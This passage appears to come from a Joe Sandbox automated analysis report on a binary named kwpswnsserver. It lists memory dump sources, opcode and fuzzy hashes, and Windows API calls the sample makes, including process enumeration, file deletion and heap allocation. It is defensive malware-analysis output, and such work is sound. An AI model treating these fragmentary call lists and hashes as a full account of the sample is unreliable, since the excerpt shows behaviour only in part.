                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseErrorHandleLast
                                                                  • String ID:
                                                                  • API String ID: 918212764-0
                                                                  • Opcode ID: cfcfed1bd2941d9395b99e20c87c5376b98b40433b94a8e0690537aae0140706
                                                                  • Instruction ID: 698fcee1dee932fdf64dffd37d56580a4b42bd0239b0836a79aeef1038452db1
                                                                  • Opcode Fuzzy Hash: cfcfed1bd2941d9395b99e20c87c5376b98b40433b94a8e0690537aae0140706
                                                                  • Instruction Fuzzy Hash: 33114C33B096605AC3165375D804BAD276D8FBBB3CF2D4309E819ABAC2DF60D8819250
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b5d5f1bfb22e89df1f1b8f4761d24c3bd062a4e1fcd55ea3cdc8e47b8c30595
                                                                  • Instruction ID: d52b155b73bb772ae2922d12d639abf546389133d87fe5916c7c80aa0ffc9f54
                                                                  • Opcode Fuzzy Hash: 4b5d5f1bfb22e89df1f1b8f4761d24c3bd062a4e1fcd55ea3cdc8e47b8c30595
                                                                  • Instruction Fuzzy Hash: 9F51A7B0A00658AFDB04CF98C884E997FB5EF55328F26C199E8587B751D371EE41CB90
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89DF62
                                                                    • Part of subcall function 6C89E2B7: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C89E314
                                                                    • Part of subcall function 6C89E2B7: VerSetConditionMask.KERNEL32(00000000), ref: 6C89E31C
                                                                    • Part of subcall function 6C89E2B7: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C89E32D
                                                                    • Part of subcall function 6C89E2B7: GetSystemMetrics.USER32(00001000), ref: 6C89E33E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
                                                                  • String ID:
                                                                  • API String ID: 2710481357-0
                                                                  • Opcode ID: 606daa51da63e9576eb0ae0e06df75a38b9c1efd3baf12cc4633ae1fedcd4ac9
                                                                  • Instruction ID: bbd9da7f0a7e809180bcd81285fa5e980984fcaf889d97253a65cf90035ab9cc
                                                                  • Opcode Fuzzy Hash: 606daa51da63e9576eb0ae0e06df75a38b9c1efd3baf12cc4633ae1fedcd4ac9
                                                                  • Instruction Fuzzy Hash: 1851CEB0905F458FD3A9CF3A85417C6FAE0BF89300F508A2E91AED6760EB716584CF55
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __wsopen_s
                                                                  • String ID:
                                                                  • API String ID: 3347428461-0
                                                                  • Opcode ID: 89ddbff2cbf64cd56578aaf29d1c31d797980f73e29026636115abf8e4d941bd
                                                                  • Instruction ID: e9a1773b741edb3c7bfc6812117e7512177ffa808edb41232cd818cf233ee314
                                                                  • Opcode Fuzzy Hash: 89ddbff2cbf64cd56578aaf29d1c31d797980f73e29026636115abf8e4d941bd
                                                                  • Instruction Fuzzy Hash: 52118C71A0460AAFCB05DF98E94199B3BF8EF48308F05809AF804EB301D730E911CBA4
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0428454A,00000000,00000001,00000000,00000000,00000000,?,04283E0D,00000001,00000214,?,04284500), ref: 0428A735
                                                                    • Part of subcall function 0427F91B: __getptd_noexit.LIBCMT ref: 0427F91B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 328603210-0
                                                                  • Opcode ID: cf81d7ec2e06bbf822af5dedf52c3c3dcfbf53d447445d1fdd42a39fb296eec5
                                                                  • Instruction ID: aa8e45d2ed311de76991c28f2d969a39ab361d2ffa957bd456e3fef55148e997
                                                                  • Opcode Fuzzy Hash: cf81d7ec2e06bbf822af5dedf52c3c3dcfbf53d447445d1fdd42a39fb296eec5
                                                                  • Instruction Fuzzy Hash: 1B01B5353222169AEB24AE29DC44B6E37A4AB817A4F1545AEE815CB1D0DF78A801D750
                                                                  APIs
                                                                    • Part of subcall function 6C9D9301: RtlAllocateHeap.NTDLL(00000000,6C9DD272,?,?,6C9DD272,00000220,?,00000016,?), ref: 6C9D9333
                                                                  • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,00000000,?,6C9D2A1B,00000000,?,?,?,?,?,6C9DF021,?,?), ref: 6C9E074F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 62e4ba6125a2a90d9812d90db437fdff0f0117c09960cabf494a40fef952a26e
                                                                  • Instruction ID: 71992f818442a7a14cd476e570b6c58166151c01a269f692305edb1b1e96bd39
                                                                  • Opcode Fuzzy Hash: 62e4ba6125a2a90d9812d90db437fdff0f0117c09960cabf494a40fef952a26e
                                                                  • Instruction Fuzzy Hash: D8F0FC3120259566DB131A679C40F8F3F6C9FBEFB8F115115E81C97AC0DF32D401A9A1
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,6C9DD272,?,?,6C9DD272,00000220,?,00000016,?), ref: 6C9D9333
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 78c5404caa8f3880807ecfa7fd39d478de12e62c087ea8238525c3ddaad71ec8
                                                                  • Instruction ID: 84d87fb7c070c836c5918e2b9d3c9b09b5c7bcc02f59b4ec6f6a85156d389166
                                                                  • Opcode Fuzzy Hash: 78c5404caa8f3880807ecfa7fd39d478de12e62c087ea8238525c3ddaad71ec8
                                                                  • Instruction Fuzzy Hash: 39E06531341A26A7FB113AE99C24F96B65C9F626ACF5BC120DC18F7DD4EF50E80181A2
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(?,?,?,?,6C873107), ref: 6C872055
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 1a0e0c09bbeb4c9cac439ba35c40a2139beed166acd05222e9716cbe4e1f7aee
                                                                  • Instruction ID: f4cce42a03ea16e3d2b3e9ef8aa54e6735b1eb2c59c54a075025e48033399014
                                                                  • Opcode Fuzzy Hash: 1a0e0c09bbeb4c9cac439ba35c40a2139beed166acd05222e9716cbe4e1f7aee
                                                                  • Instruction Fuzzy Hash: A8F0FE75C08288EFCF11EBACC1493DCBFB49B15244F0484D5D88897342E2399685CB62
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(6C86A690,00000000,?,6C9E8CD7,?,?,00000000,?,6C9E8CD7,6C86A690,0000000C), ref: 6C9E9050
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 877bf5e4d6b65f35c7c9d29e68546a07cead7f3fcaee984688d997a2e0811cbd
                                                                  • Instruction ID: b848deecb4105cd83adf3cb49c7948aa4ea2c7cb6361b45a275228de216e04cd
                                                                  • Opcode Fuzzy Hash: 877bf5e4d6b65f35c7c9d29e68546a07cead7f3fcaee984688d997a2e0811cbd
                                                                  • Instruction Fuzzy Hash: 6ED06C3210024DBBDF129E84DC06EDA3BAAFB48714F018100BE1896020C732E822AB90
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 6C883169
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 1531683806-0
                                                                  • Opcode ID: d99afeab155959af3b2eedc2ba0b1f8e2999dc56136c528369a1264107995be6
                                                                  • Instruction ID: ab882532a39b09d39a932062ee37e149b9b738ef98904a092f43513d807f818f
                                                                  • Opcode Fuzzy Hash: d99afeab155959af3b2eedc2ba0b1f8e2999dc56136c528369a1264107995be6
                                                                  • Instruction Fuzzy Hash: 7EB092B5912212AACE2066B48B087066AB45B42B0EF288DA4B006C2840EB79E4468540
                                                                  APIs
                                                                    • Part of subcall function 6C879760: CreateToolhelp32Snapshot.KERNEL32 ref: 6C87978C
                                                                    • Part of subcall function 6C879760: Process32FirstW.KERNEL32 ref: 6C87980C
                                                                    • Part of subcall function 6C879760: WideCharToMultiByte.KERNEL32 ref: 6C87986F
                                                                    • Part of subcall function 6C879760: Process32NextW.KERNEL32 ref: 6C87990D
                                                                    • Part of subcall function 6C879760: CloseHandle.KERNEL32 ref: 6C87994B
                                                                  • Sleep.KERNEL32 ref: 6C879C7F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$ByteCharCloseCreateFirstHandleMultiNextSleepSnapshotToolhelp32Wide
                                                                  • String ID:
                                                                  • API String ID: 2353013123-0
                                                                  • Opcode ID: 01dff80a930b3e360fca408c9bb0aac68015adb107cc5af2e89b3e290929ffb1
                                                                  • Instruction ID: e9f26f0f2cb82c745d45565d8812fd9e5a231c8caa0da959f2159d393c522f87
                                                                  • Opcode Fuzzy Hash: 01dff80a930b3e360fca408c9bb0aac68015adb107cc5af2e89b3e290929ffb1
                                                                  • Instruction Fuzzy Hash: 53213BB0E00359CFCB24DFACC9416DEBBB4BB05760F004A29D411AB780E775A949CBA2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 3ec5af1ef48804f8bf2418fa6cb60a96480243bf9ef1e54474ec564ccbea4ba0
                                                                  • Instruction ID: 2914ef4157316a42a034601372473a1944682de51d50f72d6e5d6040bb2260bc
                                                                  • Opcode Fuzzy Hash: 3ec5af1ef48804f8bf2418fa6cb60a96480243bf9ef1e54474ec564ccbea4ba0
                                                                  • Instruction Fuzzy Hash: DD215BB5A54348CFCB64DFECD60159DBBB1BF86305F818829C4059BB14D7B49829CB92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: e51cd8c2ca5dc8006a095227df8cbdcbf336913ca4f89663a06250d916917681
                                                                  • Instruction ID: 83e015ec8ae2f9d118281d2bebf6f4d22ebf145f2f39dde152b4745158166594
                                                                  • Opcode Fuzzy Hash: e51cd8c2ca5dc8006a095227df8cbdcbf336913ca4f89663a06250d916917681
                                                                  • Instruction Fuzzy Hash: 05D09EB5D002099FC740FFFCE94548DBFF4AB44210F008175E989D7300E6749695CB96
                                                                  APIs
                                                                  • SetRectEmpty.USER32(?), ref: 6C8B86F9
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C8B8717
                                                                  • ReleaseCapture.USER32 ref: 6C8B871D
                                                                  • SetCapture.USER32(?), ref: 6C8B8730
                                                                  • ReleaseCapture.USER32 ref: 6C8B87BD
                                                                  • SetCapture.USER32(?), ref: 6C8B87D0
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C8B88C4
                                                                  • UpdateWindow.USER32(?), ref: 6C8B8950
                                                                  • SendMessageW.USER32(?,00000111,00000000,00000000), ref: 6C8B899F
                                                                  • IsWindow.USER32(?), ref: 6C8B89AB
                                                                  • IsIconic.USER32(?), ref: 6C8B89B6
                                                                  • IsZoomed.USER32(?), ref: 6C8B89C1
                                                                  • IsWindow.USER32(?), ref: 6C8B89DF
                                                                  • UpdateWindow.USER32(?), ref: 6C8B8A3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
                                                                  • String ID:
                                                                  • API String ID: 2500574155-0
                                                                  • Opcode ID: 648969a2ac5bce63ea60ed2ceade91787b6f705fe597533dedc0f3a6592c95fb
                                                                  • Instruction ID: f6f2e3886cefa45b4705d397b99d6ea1e9b59afc81c1ff1daf52f822ce070a21
                                                                  • Opcode Fuzzy Hash: 648969a2ac5bce63ea60ed2ceade91787b6f705fe597533dedc0f3a6592c95fb
                                                                  • Instruction Fuzzy Hash: E4C1933170022A9FCF159F64CD94A9D3BB5BF49718F14467AEC2AAB791CB30A901CF51
                                                                  APIs
                                                                    • Part of subcall function 6C88AC28: GetParent.USER32(?), ref: 6C88AC32
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8A4444
                                                                  • GetKeyState.USER32(00000001), ref: 6C8A44B5
                                                                  • GetKeyState.USER32(00000001), ref: 6C8A4510
                                                                  • IsWindow.USER32(?), ref: 6C8A45D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: State$ClientParentScreenWindow
                                                                  • String ID: 0
                                                                  • API String ID: 1527269598-4108050209
                                                                  • Opcode ID: 277a9ae6ceaee3456fced50fe2d77164c9a797ea4722765d923267e1ff829534
                                                                  • Instruction ID: ea9ef469a390fb56c2c94343963e5828b120e2b2b9d515001fe2c9b391d37531
                                                                  • Opcode Fuzzy Hash: 277a9ae6ceaee3456fced50fe2d77164c9a797ea4722765d923267e1ff829534
                                                                  • Instruction Fuzzy Hash: EC61A134B023199FDF249FA4CA84BAD7BB5BFC5318F145A25E815A7A81EF709803CB41
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C8179
                                                                  • PathIsUNCW.SHLWAPI(?,?,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8229
                                                                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C824D
                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,6C8C7FEB,?,?,00000000,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C81AC
                                                                    • Part of subcall function 6C8C812D: GetLastError.KERNEL32(?,?,?,6C8C825E,?,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8139
                                                                    • Part of subcall function 6C8C8062: PathStripToRootW.SHLWAPI(00000000,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8096
                                                                  • CharUpperW.USER32(?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C827B
                                                                  • FindFirstFileW.KERNEL32(?,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8293
                                                                  • FindClose.KERNEL32(00000000,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C829F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
